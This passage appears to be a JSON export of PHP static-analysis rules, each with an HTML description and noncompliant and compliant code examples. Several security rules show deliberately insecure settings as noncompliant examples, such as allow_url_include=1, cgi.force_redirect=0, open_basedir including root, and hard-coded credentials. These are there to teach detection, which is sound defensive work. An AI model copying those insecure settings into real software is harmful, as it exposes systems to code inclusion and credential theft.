}\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\"; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n <li> You run the risk of name clashes. <\/li>\n <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. <\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) { \/\/ Noncompliant\n \/\/...\n}\n\nclass MyClass {\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass MyClass {\n\n public static $name = \"Bob\"; \/\/ Compliant\n\n public static function doSomething($arg) { \/\/ Compliant\n \/\/...\n }\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&&<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&&<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money; \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time && $have_money; \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n global $myGlobalVariable; \/\/ Noncompliant\n $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo(){\n if ($this->name != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo($nameParam){\n if ($nameParam != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n <li> generating output <\/li>\n <li> modifying <code>ini<\/code> settings <\/li>\n <li> emitting errors or exceptions <\/li>\n <li> modifying global or static variables <\/li>\n <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nprint \"Include worked!\";\n\nclass foo {\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass foo {\n\n public function log() {\n print \"Include worked!\";\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. <code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n self::getStatus(); \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() { \/\/ Doesn't actually get called\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n static::getStatus(); \/\/ Compliant\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() {\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n private static $somevar = \"hello\";\n const CONSTANT = 42;\n\n private static function foo()\n {\n $var = self::$somevar . self::CONSTANT; \/\/ Should be OK\n self::foo(); \/\/ Should be OK\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff'; \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff'; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF'; \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF'; \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\"); \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this->params()->fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Alias<\/th>\n <th>Replacement<\/th>\n <\/tr>\n <tr>\n <td><code>chop<\/code><\/td>\n <td><code>rtrim<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>close<\/code><\/td>\n <td><code>closedir<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>doubleval<\/code><\/td>\n <td><code>floatval<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>fputs<\/code><\/td>\n <td><code>fwrite<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ini_alter<\/code><\/td>\n <td><code>ini_set<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_double<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_integer<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_long<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_real<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_writeable<\/code><\/td>\n <td><code>is_writable<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>join<\/code><\/td>\n <td><code>implode<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>key_exists<\/code><\/td>\n <td><code>array_key_exists<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>magic_quotes_runtime<\/code><\/td>\n <td><code>set_magic_quotes_runtime<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>pos<\/code><\/td>\n <td><code>current<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>show_source<\/code><\/td>\n <td><code>highlight_file<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>sizeof<\/code><\/td>\n <td><code>count<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>strchr<\/code><\/td>\n <td><code>strstr<\/code><\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n firstActionInBlock();\n secondAction(); \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++)\n $str = $array[$i];\n doTheThing($str); \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n firstActionInBlock();\n secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++) {\n $str = $array[$i];\n doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct() {\n $this->object = new SomeOtherClass(); \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct(SomeOtherClass $object) {\n $this->object = $object;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\" Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\" ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n <li> see the URL over the user's shoulder <\/li>\n <li> be sent the URL by the user <\/li>\n <li> retrieve the URL from browser history <\/li>\n <li> ... <\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n <li> It can significantly impair the readability of the code. <\/li>\n <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. <\/li>\n <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n other than that cause by the increment or decrement operator <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n effects <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a < $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n echo(\"i = $i\");\n $i++;\n if ($i < 10){\n goto loop;\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; 